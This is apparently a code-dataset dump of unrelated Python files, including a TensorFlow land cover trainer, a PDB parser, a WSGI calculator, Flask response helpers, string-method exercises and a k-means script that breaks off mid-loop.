blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
4b2bb4912f6bec7f2eada013ce9cd897a797e2b9 | Python | PrashantThakurNitP/python-december-code | /assignment 2.8 print in dictionary order.py | UTF-8 | 657 | 3.96875 | 4 | [] | no_license | x=input("input first string :")
# Read the remaining two of the three strings to compare (the first
# string, x, is read on the preceding line).
y=input("enter second string : ")
z=input("enter third string : ")
# Exhaustive case analysis printing the three strings in ascending
# lexicographic ("dictionary") order, one per line.
if x>=y:
    if y>=z:
        # z <= y <= x
        print("the string in dictionary order are")
        print(z,y,x,sep="\n")
    elif z>x:
        # y < z and x < z, with y <= x  ->  y <= x < z
        print("the string in dictionary order are")
        print(y,x,z,sep="\n")
    else:
        # y < z <= x
        print("the string in dictionary order are")
        print(y,z,x,sep="\n")
else :
    if z>=y:
        # x < y <= z
        print("the string in dictionary order are")
        print(x,y,z,sep="\n")
    elif x>=z:
        # z <= x < y
        print("the string in dictionary order are")
        print(z,x,y,sep="\n")
    else:
        # x < z < y
        print("the string in dictionary order are")
        print(x,z,y,sep="\n")
| true |
09c314502edde5591d88f1de8c98d15463c0ae21 | Python | mvpzone/python-docs-samples | /people-and-planet-ai/land-cover-classification/trainer.py | UTF-8 | 7,350 | 2.75 | 3 | [
"Apache-2.0"
] | permissive | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This trains a TensorFlow model to classify land cover.
The model is a simple Fully Convolutional Network (FCN) using the
TensorFlow Keras high-level API.
"""
import os
from typing import Dict, Tuple
import tensorflow as tf
# Define the input and output names for the model.
# NOTE(review): band names look like Sentinel-2 spectral bands — confirm
# against the dataset export pipeline.
INPUT_BANDS = [
    "B1",
    "B2",
    "B3",
    "B4",
    "B5",
    "B6",
    "B7",
    "B8",
    "B8A",
    "B9",
    "B10",
    "B11",
    "B12",
]
# Name of the label band in each TFRecord example.
OUTPUT_BANDS = ["landcover"]
# Number of land cover classifications.
NUM_CLASSIFICATIONS = 9
def preprocess(values: Dict[str, tf.Tensor]) -> Tuple[Dict[str, tf.Tensor], tf.Tensor]:
    """Split a parsed example into (inputs, outputs) for training.

    Args:
        values: Dictionary of 2D tensors, one per band.

    Returns: A tuple of (input band dictionary, one-hot encoded labels).
    """
    # Keep only the bands the model consumes.
    model_inputs = {band: values[band] for band in INPUT_BANDS}
    # One-hot encode the integer land cover labels.
    labels = tf.one_hot(tf.cast(values["landcover"], tf.uint8), NUM_CLASSIFICATIONS)
    return (model_inputs, labels)
def read_dataset(
    file_pattern: str, patch_size: int, batch_size: int
) -> tf.data.Dataset:
    """Reads a compressed TFRecord dataset and preprocesses it into a machine
    learning friendly format.

    Args:
        file_pattern: Local or Cloud Storage file pattern of the TFRecord files.
        patch_size: Patch size of each example.
        batch_size: Number of examples to batch together.

    Returns: A tf.data.Dataset ready to feed to the model.
    """
    # Create the features dictionary, we need this to parse the TFRecords.
    # Every band (inputs and label) is a patch_size x patch_size float grid.
    input_shape = (patch_size, patch_size)
    features_dict = {
        band_name: tf.io.FixedLenFeature(input_shape, tf.float32)
        for band_name in INPUT_BANDS + OUTPUT_BANDS
    }
    return (
        # We list and interleave each TFRecord file to process each file in parallel.
        tf.data.Dataset.list_files(file_pattern)
        .interleave(
            # Files are GZIP-compressed TFRecords.
            lambda filename: tf.data.TFRecordDataset(filename, compression_type="GZIP"),
            cycle_length=tf.data.AUTOTUNE,
            num_parallel_calls=tf.data.AUTOTUNE,
            deterministic=False,
        )
        # We batch before parsing and preprocessing so it can be vectorized.
        .batch(batch_size)
        .map(
            lambda batch: tf.io.parse_example(batch, features_dict),
            num_parallel_calls=tf.data.AUTOTUNE,
        )
        .map(preprocess, num_parallel_calls=tf.data.AUTOTUNE)
        # Finally we cache the current batch and prefetch the next one.
        # NOTE(review): cache() keeps the full parsed dataset in memory —
        # confirm the dataset fits in RAM for the configured patch/batch sizes.
        .cache()
        .prefetch(tf.data.AUTOTUNE)
        # For more information on how to optimize your tf.data.Dataset, see:
        # https://www.tensorflow.org/guide/data_performance
    )
def new_model(training_dataset: tf.data.Dataset) -> tf.keras.Model:
    """Creates a new Fully Convolutional Network (FCN) model.

    Args:
        training_dataset: The dataset to use for the normalization layer.

    Returns: A compiled Fully Convolutional Network model.
    """
    # Adapt the Normalization layer with the training dataset so it learns
    # the per-channel mean/variance of the input bands.
    normalization = tf.keras.layers.Normalization()
    normalization.adapt(
        training_dataset.map(
            # Stack the per-band dicts into one (..., bands) tensor.
            lambda inputs, _: tf.stack([inputs[name] for name in INPUT_BANDS], axis=-1)
        )
    )
    # Define the Fully Convolutional Network. Conv2D shrinks the patch by
    # the kernel margin and Conv2DTranspose restores the spatial size; the
    # Dense layer applies per-pixel to produce class probabilities.
    layers = [
        tf.keras.Input(shape=(None, None, len(INPUT_BANDS))),
        normalization,
        tf.keras.layers.Conv2D(filters=32, kernel_size=5, activation="relu"),
        tf.keras.layers.Conv2DTranspose(filters=16, kernel_size=5, activation="relu"),
        tf.keras.layers.Dense(NUM_CLASSIFICATIONS, activation="softmax"),
    ]
    fcn_model = tf.keras.Sequential(layers, name="FullyConvolutionalNetwork")
    # Define the input dictionary layers, one single-channel input per band.
    input_layers = {
        name: tf.keras.Input(shape=(None, None, 1), name=name) for name in INPUT_BANDS
    }
    # Model wrapper that takes an input dictionary and feeds it to the FCN.
    inputs = tf.keras.layers.concatenate(input_layers.values())
    model = tf.keras.Model(input_layers, fcn_model(inputs))
    model.compile(
        optimizer="adam",
        # Labels are one-hot encoded by preprocess(), hence categorical.
        loss="categorical_crossentropy",
        metrics=[
            tf.keras.metrics.OneHotIoU(
                num_classes=NUM_CLASSIFICATIONS,
                target_class_ids=list(range(NUM_CLASSIFICATIONS)),
            )
        ],
    )
    return model
def run(
    training_data: str,
    validation_data: str,
    model_path: str,
    patch_size: int,
    epochs: int,
    batch_size: int = 256,
) -> None:
    """Creates, trains and saves a new model.

    Args:
        training_data: File pattern for the training data files.
        validation_data: File pattern for the validation data files.
        model_path: Path to save the model to.
        patch_size: Patch size of the training and validation datasets.
        epochs: Number of times to go through the training dataset.
        batch_size: Number of examples for the model to look at the same time.
    """
    # Build the input pipelines.
    train_dataset = read_dataset(training_data, patch_size, batch_size)
    val_dataset = read_dataset(validation_data, patch_size, batch_size)

    # Create, train and persist the model.
    model = new_model(train_dataset)
    model.fit(train_dataset, validation_data=val_dataset, epochs=epochs)
    model.save(model_path)
if __name__ == "__main__":
    # Command line entry point; all flags map 1:1 onto run()'s parameters
    # (argparse converts --foo-bar into args.foo_bar).
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--training-data",
        default="datasets/training*.tfrecord.gz",
        help="Local or Cloud Storage file pattern for the training data files.",
    )
    parser.add_argument(
        "--validation-data",
        default="datasets/validation*.tfrecord.gz",
        help="Local or Cloud Storage file pattern for the validation data files.",
    )
    parser.add_argument(
        "--model-path",
        # AIP_MODEL_DIR is presumably injected by the managed training
        # service — confirm with the deployment configuration.
        default=os.environ.get("AIP_MODEL_DIR", "model"),
        help="Local or Cloud Storage path to save the model to.",
    )
    parser.add_argument(
        "--patch-size",
        default=16,
        type=int,
        help="Patch size of the training and validation datasets.",
    )
    parser.add_argument(
        "--epochs",
        default=50,
        type=int,
        help="Number of times to go through the training dataset.",
    )
    parser.add_argument(
        "--batch-size",
        default=256,
        type=int,
        help="Number of examples for the model to look at the same time.",
    )
    args = parser.parse_args()
    run(**vars(args))
| true |
a37d3e3fa59b0a1eab1f1052052a7955450745b9 | Python | JLuebben/pdb2blend | /readpdb.py | UTF-8 | 4,897 | 2.953125 | 3 | [] | no_license | from collections import OrderedDict
class DuplicateAtomError(Exception):
    """Raised by PdbObject.addAtom when an atom id was already registered."""
    pass
class PdbObject(object):
    """In-memory representation of the ATOM records of a PDB file.

    Atoms are indexed by serial number, grouped into Residue objects by
    residue number, and additionally bucketed by residue class name.
    """

    def __init__(self, fileName):
        self._fileName = fileName
        # atom serial number -> Atom, in file order
        self._atomsByEntry = OrderedDict()
        # residue number -> Residue, in file order
        self._residues = OrderedDict()
        # residue class name (e.g. 'GLY') -> list of Residue objects
        self._residuesByClass = {}

    def read(self):
        """Parse the file, keeping only 'ATOM' records.

        Fields are sliced by fixed column positions.
        NOTE(review): the PDB format defines the serial number in columns
        7-11 (slice [6:11]) — the [7:11] slice here drops the first digit
        for 5-digit serials; confirm against the files actually read.
        """
        with open(self._fileName, 'r') as fp:
            for line in fp.readlines():
                if not line.startswith('ATOM'):
                    continue
                atomId = int(line[7:11])
                atomName = line[13:16].strip()
                residueName = line[17:20].strip()
                chain = line[21].strip()
                residue = int(line[23:26])
                element = line[76:78].strip()
                # x, y, z coordinates share one column span.
                position = [float(w) for w in line[31:54].strip().split() if w]
                atom = Atom(atomId, atomName, residueName, position, residue, chain, element)
                self.addAtom(atom)

    def addAtom(self, atom):
        """Register *atom*, creating its Residue on first sight.

        Raises:
            DuplicateAtomError: if the atom's serial number is already known.
        """
        if atom.id in self._atomsByEntry:
            raise DuplicateAtomError
        self._atomsByEntry[atom.id] = atom
        residueNumber = atom.residue
        if not residueNumber in self._residues:
            resi = Residue(residueNumber, atom.residueName)
            self._residues[residueNumber] = resi
        else:
            resi = self._residues[residueNumber]
        resi.addAtom(atom)
        if not atom.residueName in self._residuesByClass:
            self._residuesByClass[atom.residueName] = []
        self._residuesByClass[atom.residueName].append(resi)

    def center(self):
        """Translate all atoms so their centroid moves to the origin."""
        X, Y, Z = [],[],[]
        for atom in self._atomsByEntry.values():
            x, y, z = atom.position
            X.append(x)
            Y.append(y)
            Z.append(z)
        x = sum(X)/len(X)
        y = sum(Y)/len(Y)
        z = sum(Z)/len(Z)
        offset = (x,y,z)
        for atom in self._atomsByEntry.values():
            atom.translate(offset)

    def __getitem__(self, item):
        # Lookup by residue number, not by position.
        return self._residues[item]

    def __iter__(self):
        for residue in self._residues.values():
            yield residue

    def iterBackBone(self, triples=False):
        """Yield backbone atom positions.

        With triples=True, one [N, CA, C] list per residue is yielded;
        otherwise the positions are yielded flat, one at a time.
        """
        for residue in self:
            if triples:
                yield [pos for pos in residue.iterBackBone()]
            else:
                for pos in residue.iterBackBone():
                    yield pos
class Residue(object):
    """A single residue: an ordered, name-keyed collection of atoms.

    Backbone accessors assume the standard 'N', 'CA' and 'C' atom
    names are present.
    """

    def __init__(self, number, cls):
        self._number = number
        self._class = cls
        self._atoms = OrderedDict()

    def addAtom(self, atom):
        """Register *atom* under its name (a later same-named atom wins)."""
        self._atoms[atom.name] = atom

    def __iter__(self):
        """Yield the atoms in insertion order."""
        for member in self._atoms.values():
            yield member

    @property
    def position(self):
        """Position of the backbone carbonyl carbon ('C') atom."""
        return self._atoms['C'].position

    def iterBackBone(self):
        """Yield the backbone positions in N, CA, C order."""
        for name in ('N', 'CA', 'C'):
            yield self._atoms[name].position

    def iterBonds(self):
        """Yield each pair of atoms closer than 1.7 (presumably Angstrom)
        exactly once, as (earlier, later) in insertion order."""
        members = list(self._atoms.values())
        for index, first in enumerate(members):
            for second in members[index + 1:]:
                if self._dist(first.position, second.position) < 1.7:
                    yield first, second

    def _dist(self, pos1, pos2):
        """Euclidean distance between two coordinate triples."""
        squared = sum((a - b) ** 2 for a, b in zip(pos1, pos2))
        return squared ** 0.5
class Atom(object):
    """A single PDB ATOM record (serial, name, residue and coordinates)."""

    def __init__(self, atomId, atomName, residueName, position, residue, chain='A', element='C', ):
        self.id = atomId
        self.name = atomName
        self.residueName = residueName
        self.position = position
        self.residue = residue
        self.chain = chain
        self.element = element

    def __str__(self):
        return 'ATOM {:3} in residue {:3} at {}'.format(
            self.name, self.residueName, str(self.position))

    def translate(self, offset):
        """Shift the position by subtracting *offset* component-wise."""
        self.position = [coord - delta for coord, delta in zip(self.position, offset)]
if __name__ == '__main__':
    # Ad-hoc smoke test: NOTE(review) the path is a hard-coded local
    # Windows path — parameterize before reuse.
    pdb = PdbObject('C:/Users/arrah/Desktop/OverLayCln5Se-PPPDE1/x.pdb')
    pdb.read()
    # Print every atom of residue number 101.
    for atom in pdb[101]:
        print(atom)
        print(atom.position)
    # for resi in pdb:
    #     print(resi.position)
    # print()
    # for pos in pdb.iterBackBone(triples=True):
    #     print(pos)
    # pdb.center()
    # for pos in pdb.iterBackBone(triples=True):
    #     print(pos)
for bond in pdb[101].iterBonds():
print(bond) | true |
c740a29bee23a34edacb2cba7bb182903f2c2e14 | Python | Aasthaengg/IBMdataset | /Python_codes/p03496/s925946878.py | UTF-8 | 371 | 3.25 | 3 | [] | no_license | I = int(input())
# Competitive-programming script (presumably an interactive/constructive
# task — operations are printed with flush for an online judge).
L = list(map(int, input().split()))
# Announce the number of operations: I on the pivot plus I-1 chained ops.
print(2*I-1, flush=True)
# Find the element with the largest absolute value and its index.
m = 0
m_index = 0
for i, item in enumerate(L):
    if abs(item) > abs(m):
        m = item
        m_index = i
# Add the dominant element onto every position (1-based indices).
for i in range(I):
    print(m_index+1, i+1, flush=True)
if m >= 0:
    # All values now non-negative: prefix-accumulate left to right.
    for i in range(0, I-1):
        print(i+1, i+2)
else:
    # All values now non-positive: accumulate right to left.
    for i in range(I, 1, -1):
        print(i, i-1)
| true |
f092f3b1f4a5eb4c0ef087a8010212550dcf5af6 | Python | russlarge256/wsgi-calculator | /calculator.py | UTF-8 | 3,630 | 3.5625 | 4 | [] | no_license | import traceback
def home():
    """Return the HTML body for the calculator's landing/usage page."""
    page = """
    <h1> Web Calculator </h1>
    <p>In order to use this website effectively, use the url to
    specify operation type (add, subtract, multiply, divide) and the numbers
    for the operation. Example: http://localhost:8080/add/2/3
    """
    return page
def multiply(*args):
    """Return an HTML page with the product of two integer operands.

    Args:
        args: URL path segments, e.g. ("2", "3").

    Returns:
        An HTML string. On malformed input an error page is returned;
        the original returned None (it only printed the error), which
        made the WSGI layer crash when computing Content-length.
    """
    try:
        one, two = args
        mult = int(one) * int(two)
        page = f"""
        <h1>Multiplication Page</h1>
        <h2>{mult}</h2>
        """
        return page
    except ValueError:
        # Covers both non-integer operands and a wrong operand count
        # (unpacking the wrong number of args also raises ValueError).
        return "<h1>Error: multiply needs two integer operands</h1>"
def divide(*args):
    """Return an HTML page with the quotient of two integer operands.

    Implements the module TODO: dividing by zero now yields an error
    page instead of an unhandled ZeroDivisionError. Malformed input
    likewise returns an error page rather than None (the original's
    None return crashed the WSGI layer at Content-length time).

    Args:
        args: URL path segments, e.g. ("6", "3").
    """
    try:
        one, two = args
        # Renamed from `divide` to avoid shadowing this function's name.
        quotient = int(one) / int(two)
        page = f"""
        <h1>Division Page</h1>
        <h2>{quotient}</h2>
        """
        return page
    except ZeroDivisionError:
        return "<h1>Error: cannot divide by zero</h1>"
    except ValueError:
        return "<h1>Error: divide needs two integer operands</h1>"
def subtract(*args):
    """Return an HTML page with the difference of two integer operands.

    Args:
        args: URL path segments, e.g. ("5", "2").

    Returns:
        An HTML string. On malformed input an error page is returned
        instead of None (consistent with the other operation handlers;
        a None return crashed the WSGI layer at Content-length time).
    """
    try:
        one, two = args
        difference = int(one) - int(two)
        page = f"""
        <h1>Subtraction Page</h1>
        <h2>{difference}</h2>
        """
        return page
    except ValueError:
        return "<h1>Error: subtract needs two integer operands</h1>"
def add(*args):
    """Return an HTML page with the sum of the integer operands.

    Accepts any number of operands (zero operands sums to 0).

    Returns:
        An HTML string. The original caught ValueError mid-loop and then
        rendered whatever partial sum had accumulated (via finally) —
        a silently wrong result; malformed input now yields an error
        page instead. The leftover per-item debug print was removed.
    """
    try:
        total = sum(int(item) for item in args)
    except ValueError:
        return "<h1>Error: add needs integer operands</h1>"
    page = f"""
    <h1>Addition Page</h1>
    <h2>{total}</h2>
    """
    return page
def resolve_path(path):
    """Map a request path to a handler callable and its arguments.

    The first path segment selects the operation ('' selects the home
    page); the remaining segments are passed through as string args.

    Raises:
        NameError: if the first segment names no known operation.
    """
    funcs = {
        'add': add,
        'subtract': subtract,
        'divide': divide,
        'multiply': multiply,
        '': home,
    }
    segments = path.strip('/').split('/')
    func_name, numbers = segments[0], segments[1:]
    if func_name not in funcs:
        raise NameError
    return funcs[func_name], numbers
def application(environ, start_response):
    """WSGI entry point: route the request path to a handler and respond.

    Maps NameError (unknown operation) to 404 and any other failure to a
    500 page, printing the traceback for debugging.
    """
    headers = [('Content-type', 'text/html')]
    try:
        path = environ.get('PATH_INFO', None)
        print(path)
        func, args = resolve_path(path)
        body = func(*args)
        status = "200 OK"
    except NameError:
        status = "404 Not Found"
        body = "<h1>Not Found</h1>"
    except Exception:
        # NOTE(review): status text "500 Not Found" should presumably be
        # "500 Internal Server Error".
        status = "500 Not Found"
        body = "<h1>Internal Server Error</h1>"
        print(traceback.format_exc())
    finally:
        # NOTE(review): returning from finally swallows any exception
        # raised above; also, a handler returning None makes len(body)
        # raise here — handlers must always return a string.
        print(f"This is the body:{body}")
        headers.append(('Content-length', str(len(body))))
        start_response(status, headers)
        return [body.encode('utf8')]
if __name__ == '__main__':
    # Serve the WSGI app locally with the stdlib reference server.
    from wsgiref.simple_server import make_server
    server = make_server('localhost', 8080, application)
    server.serve_forever()
| true |
4885480138ca6271277587003c6ad095ef0ac7f1 | Python | avanger9/LP-laboratori | /python/practica/prova1.py | UTF-8 | 71 | 3.515625 | 4 | [] | no_license | a = [1,2,3,4,5]
b = [9,8,7]
# NOTE(review): iterating over the tuple (a, b) yields the two list
# objects themselves, and unpacking the 5-element list `a` into (c, d)
# raises ValueError at runtime. zip(a, b) is presumably the intent —
# confirm with the exercise statement.
for c, d in (a,b):
    print(c), print(d)
| true |
b513a1963ce8c6dd11ba50eb69fdf709a10fd91f | Python | lutzer/sahabe | /de.sahabe.backend/main/app/response.py | UTF-8 | 2,029 | 2.515625 | 3 | [] | no_license | '''
Created on Jul 13, 2014
@author: Maan Al Balkhi
'''
from flask import Response
from flask import json
# Default CORS headers attached to every Response built below.
# NOTE(review): this module uses dict.iteritems(), i.e. Python 2.
headers = {"Access-Control-Allow-Origin":"http://127.0.0.1:8000",
           "Access-Control-Allow-Methods":"*",
           "Access-Control-Allow-Credentials":"true",
           "Access-Control-Allow-Headers":"X-Requested-With"}

def send400(message="operation failed", mimetype='application/json'):
    """400 Bad Request with a JSON {"message": ...} body."""
    js = json.dumps({"message":message})
    resp = Response(js, status=400, mimetype=mimetype)
    for key, value in headers.iteritems():
        resp.headers.add(key, value)
    return resp

def send401(message="unauthorized", mimetype='application/json'):
    """401 Unauthorized with a JSON {"message": ...} body."""
    js = json.dumps({"message":message})
    resp = Response(js, status=401, mimetype=mimetype)
    for key, value in headers.iteritems():
        resp.headers.add(key, value)
    return resp

def response200():
    """Bare 200 OK with CORS headers and no body."""
    resp = Response(status=200)
    for key, value in headers.iteritems():
        resp.headers.add(key, value)
    return resp

def send200(message="operation was successful", mimetype='application/json'):
    """200 OK with a JSON {"message": ...} body."""
    js = json.dumps({"message":message})
    resp = Response(js, status=200, mimetype=mimetype)
    for key, value in headers.iteritems():
        resp.headers.add(key, value)
    return resp

def send204(message="operation was not successful", mimetype='application/json'):
    """204 No Content with a JSON message body.

    NOTE(review): 204 responses are defined as body-less — confirm
    clients actually receive this payload.
    """
    js = json.dumps({"message":message})
    resp = Response(js, status=204, mimetype=mimetype)
    for key, value in headers.iteritems():
        resp.headers.add(key, value)
    return resp

def sendResponse(status=200, mimetype="text/html"):
    """Body-less response with the given status and mimetype."""
    resp = Response(status=status, mimetype=mimetype)
    for key, value in headers.iteritems():
        resp.headers.add(key, value)
    return resp

def sendData(data, status=200, mimetype='application/json'):
    """Serialize *data* to JSON and send it with the given status."""
    js = json.dumps(data)
    resp = Response(js, status=status, mimetype=mimetype)
    for key, value in headers.iteritems():
        resp.headers.add(key, value)
    return resp
| true |
a1627eb146da2821a6b3fc5d630ab3724b508fe3 | Python | TTKSilence/Educative | /GrokkingTheCodeInterview-PatternsForCodingQuestions/1.PatternSlidingWindow/5.FruitsIntoBaskets(med).py | UTF-8 | 570 | 3.3125 | 3 | [] | no_license | def solution(Fruit):
    # Sliding window over Fruit keeping at most 2 distinct fruit types
    # ("baskets"); basket maps type -> count inside the window.
    left=0
    basket={}
    count=0
    maxlength=0
    for i,x in enumerate(Fruit):
        if x in basket:
            basket[x]+=1
        else:
            basket[x]=1
            count+=1
        # Shrink from the left until only 2 distinct types remain.
        while count>2:
            basket[Fruit[left]]-=1
            if basket[Fruit[left]]==0:
                del basket[Fruit[left]]
                count-=1
            left+=1
        # Window [left, i] is valid; record its length.
        maxlength=max(maxlength,i-left+1)
    return maxlength
def main():
    # Ad-hoc checks: expected 3 and 5 per the printed runs.
    print(solution(['A','B','C','A','C']))
    print(solution(['A','B','C','B','B','C']))
main() | true |
6beca6e93062b6f4d8cd05282e6a68169a5b260a | Python | Kawser-nerd/CLCDSA | /Source Codes/AtCoder/arc088/B/3620240.py | UTF-8 | 283 | 3.359375 | 3 | [] | no_license | def main():
    # Read the string and start from its middle character.
    buf = input()
    S = buf
    K = len(S) // 2
    center_char = S[K]
    # Grow K while the characters at K (from the left) and -K-1 (from
    # the right) both still equal the center character.
    while K < len(S):
        if S[K] == center_char and S[-K - 1] == center_char:
            K += 1
        else:
            break
    print(K)
if __name__ == '__main__':
    main()
b3b5ca2a033a6c4011c90c3f748500106521b77f | Python | calebsimmons/hungry_monsters | /tiny_monsters/psc_parser.py | UTF-8 | 5,417 | 3.171875 | 3 | [] | no_license | """
This module implements a parser for PySCeS Model Description
Language files, according to the spec provided [LINK GOES HERE].
Input: A .psc filename Output: A list containing reactions and a
dictionary of initial values.
A reaction is a list of the form:
[[reactants],[products],rate]
A initial value dictionary is a dict of the form:
{'species_name':copy_number}
Example output:
[[['P_protein',' Z_basal_promoter' ,'Z_basal_promoter'],
['Z_repressed_promoter '], 0.281893898709],
[['Z_repressed_promoter'],['P_protein','Z_basal_promoter '],1],
[[],['S'],10],
{'X':1}]
"""
import string,re
class Parser(object):
    """Parser class for PSC files.

    NOTE(review): this is Python 2 code (print statement, builtin
    reduce, filter returning a list).
    """
    def __init__(self,filename):
        """Initialize a Parser from a PSC filename."""
        with open(filename) as f:
            self.lines = [line.strip() for line in f.readlines()]
        # Accumulated [[reactants], [products], rate] triples.
        self.reactions = []
        # species name -> initial copy number
        self.init_vals = {}
    def parse_lines_into_sentences(self):
        """Accept a list of lines and return a list of 'sentences'.

        A sentence is a list of lines which describe a single complete
        assertion about the model: an individual reaction (equation line
        plus rate line) or an initial value declaration (one line).
        """
        sentences = []
        current_reaction = []
        for line in self.lines:
            if self.sees_comment(line) or self.sees_blank_line(line):
                continue # checking for comments needs to happen first
            elif "=" in line:
                # Initial value declarations are one-line sentences.
                sentences.append([line])
            elif self.sees_reaction_name(line):
                # Reaction name labels carry no information we need.
                continue
            elif self.sees_reaction_equation(line):
                current_reaction.append(line)
            elif self.sees_reaction_rate(line):
                # Rate line completes the reaction sentence.
                current_reaction.append(line)
                sentences.append(current_reaction)
                current_reaction = []
        return sentences
    def parse(self):
        """Parse all sentences; returns (reactions, init_vals)."""
        sentences = self.parse_lines_into_sentences()
        for sentence in sentences:
            self.parse_sentence(sentence) # side effects on self
        return (self.reactions,self.init_vals)
    def parse_sentence(self,sentence):
        """Dispatch on sentence length: 1 line = init value, 2 = reaction."""
        if len(sentence) == 1:
            return self.parse_init_val(sentence)
        elif len(sentence) == 2:
            return self.parse_reaction(sentence)
        else:
            raise Exception("Sentence could not be parsed:",sentence)
    def parse_init_val(self,sentence):
        """Record a 'symbol = value' declaration in self.init_vals."""
        line = sentence[0]
        symbol,value = line.split('=')
        self.init_vals[symbol.strip()] = float(value)
    def parse_reaction(self,sentence):
        """Parse an [equation, rate] sentence into self.reactions."""
        # NOTE(review): leftover debug output (py2 print statement).
        print sentence
        equation,rate = sentence
        lhs,rhs = equation.split('>')
        reactants,products = map(self.parse_half_equation,[lhs,rhs])
        raw_rate_components = [comp.strip() for comp in rate.split("*")]
        # The Gillespie engine adjusts the effective rate by reactant
        # copy numbers, so keep only the numeric factors.
        rate_components = filter(self.sees_numeric,raw_rate_components)
        # NOTE(review): the components are still strings here, so this
        # reduce performs string repetition (int * str), not arithmetic —
        # presumably float conversion was intended; confirm expected output.
        rate = reduce(lambda x,y:x*y,rate_components,1)
        self.reactions.append([reactants,products,rate])
    def parse_half_equation(self,half_equation):
        """Take a lhs or rhs and return a list of species components."""
        raw_species = [species.strip() for species in half_equation.split('+')
                       if not "$pool" in species] # ignore $pool
        species = self.rectify_coefficients(raw_species)
        return species
    def rectify_coefficients(self,stoich_vector):
        """Expand stoichiometric coefficients recursively.

        Accepts a half-reaction vector of the form ['R1', '{2} R2', ...]
        and converts it to ['R1', 'R2', 'R2', ...].
        """
        if stoich_vector == []:
            return []
        else:
            first_species,rest_species = stoich_vector[0],stoich_vector[1:]
            if "{" in first_species:
                regexp = """\{ #an openstache
                ([0-9]+) #any number of digits, which we capture
                \} #a closestache
                \s #whitespace
                ([A-Za-z]+) #species name, which we capture"""
                coeff,species = re.search(regexp,
                                          first_species,
                                          re.VERBOSE).groups()
                # Repeat the species name coefficient-many times.
                effective_species = [species] * int(coeff)
                return effective_species + self.rectify_coefficients(rest_species)
            else:
                return [first_species] + self.rectify_coefficients(rest_species)
    # --- line classifiers -------------------------------------------------
    def sees_blank_line(self,line):
        return all(char in string.whitespace for char in line)
    def sees_comment(self,line):
        return line.startswith('#')
    def sees_reaction_name(self,line):
        return line.endswith(':')
    def sees_reaction_equation(self,line):
        return ">" in line
    def sees_reaction_rate(self,line):
        # A rate may also be a single symbol with no '*'.
        return "*" in line or not ">" in line
print "loaded parser"
| true |
d56d9b5a0018e44ef5f77bf1a2a3af295d6f8f64 | Python | PabloPedace/Python-Curso-Youtube | /metodosdecadenas.py | UTF-8 | 2,394 | 4.625 | 5 | [] | no_license | #Metodos de cadenas
# Demo of common string methods (prompts/messages are intentionally in
# Spanish — they are runtime output, not comments).
myStr = "hello world"
print("HELLO WORLD AND " + myStr) # concatenation with +
print(f"HELLO WORLD AND {myStr}") # concatenation via f-string
print("HELLO WORLD AND {0}".format(myStr)) # concatenation via str.format
#print(dir(myStr))
# print(myStr.upper()) # converts everything to upper case
# print(myStr.lower()) # converts everything to lower case
# print(myStr.swapcase()) # swaps upper case and lower case
# print(myStr.capitalize()) # upper-cases the first letter of the text
# print(myStr.replace("hello", "bye")) # replaces the chosen words or letters
# print(myStr.replace("hello", "bye").upper())
# print(myStr.count("l")) # how many times the letter appears
# print(myStr.startswith("hola")) # True/False: does the text start with this
# print(myStr.startswith("hello"))
# print(myStr.startswith("he"))
# print(myStr.endswith("world")) # True/False: does the text end with this
# print(myStr.split()) # splits into words on whitespace
# print(myStr.strip()) # removes leading and trailing whitespace
# print(myStr.split("o")) # splits on the given separator
# print(myStr.find("o")) # index of the first occurrence
# print(myStr.rfind()) # like find(), but searching from the end
# print(len(myStr)) # length of the string
# print(myStr.find("e"))
# print(myStr.index("e"))
# print(myStr.isdigit()) # returns a boolean
# print(myStr.isnumeric()) # is the string numeric
# print(myStr.isalpha()) # is the string alphabetic
# print(myStr.isalum()) # NOTE(review): typo — isalnum() checks alphanumeric
print(myStr[4]) # character at index 4
print(myStr[-5]) # negative index counts from the end
nombreUsuario=input("Introduce tu nombre de Usuario: ")
print("El nombre es: ", nombreUsuario.upper())
print("El nombre es: ", nombreUsuario.lower())
print("El nombre es: ", nombreUsuario.capitalize())
edad=input("Introduce la edad: ")
# Re-prompt until the age string is purely digits.
while(edad.isdigit()==False):
    print("Por favor, introduce un valor numerico")
    edad=input("Introduce la edad: ")
# Simple age gate at 18.
if (int(edad)<18):
    print("No puede pasar")
else:
    print("Puedes pasar")
7b2507ded388ce9e7e21b055a295f650d83e4616 | Python | Aasthaengg/IBMdataset | /Python_codes/p02717/s631808751.py | UTF-8 | 55 | 2.703125 | 3 | [] | no_license | A,B,C = (int(x) for x in input().split())
print(C,A,B)
| true |
de600dcb250ad6782464edc36bdb05fbb49d51da | Python | YellowKyu/ml-interview-review | /kmeans.py | UTF-8 | 1,648 | 3.203125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import make_blobs
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split

# Generate a synthetic clustering dataset (10 features, 5 true centers).
X, Y = make_blobs(n_samples=1000, n_features=10, centers=5)

# visualization
#plt.scatter(X[:, 0], X[:, 1], marker='o', c=Y, s=25, edgecolor='k')
#plt.show()

# Hold out 20% of the samples (only x/y are used for clustering below).
x, x_val, y, y_val = train_test_split(X, Y, test_size=0.2)

# Init: pick k random samples as the starting centroids.
k = 5
rand_index = np.random.choice(x.shape[0], k)
centroids = x[rand_index]
iteration = 0

# Lloyd's algorithm: iterate assign/update until no centroid moves.
while True:
    # Distances between every sample and every centroid via broadcasting:
    # diff has shape (n_samples, k, n_features).
    diff = (x[:, np.newaxis] - centroids)
    dist = np.linalg.norm(diff, ord=2, axis=(2))
    # Index of the nearest centroid for each sample.
    dist_min = np.argmin(dist, axis=1)
    # Update each centroid to the mean of its assigned samples.
    updated = False
    for c in range(k):
        index_all_c = np.where(dist_min == c)
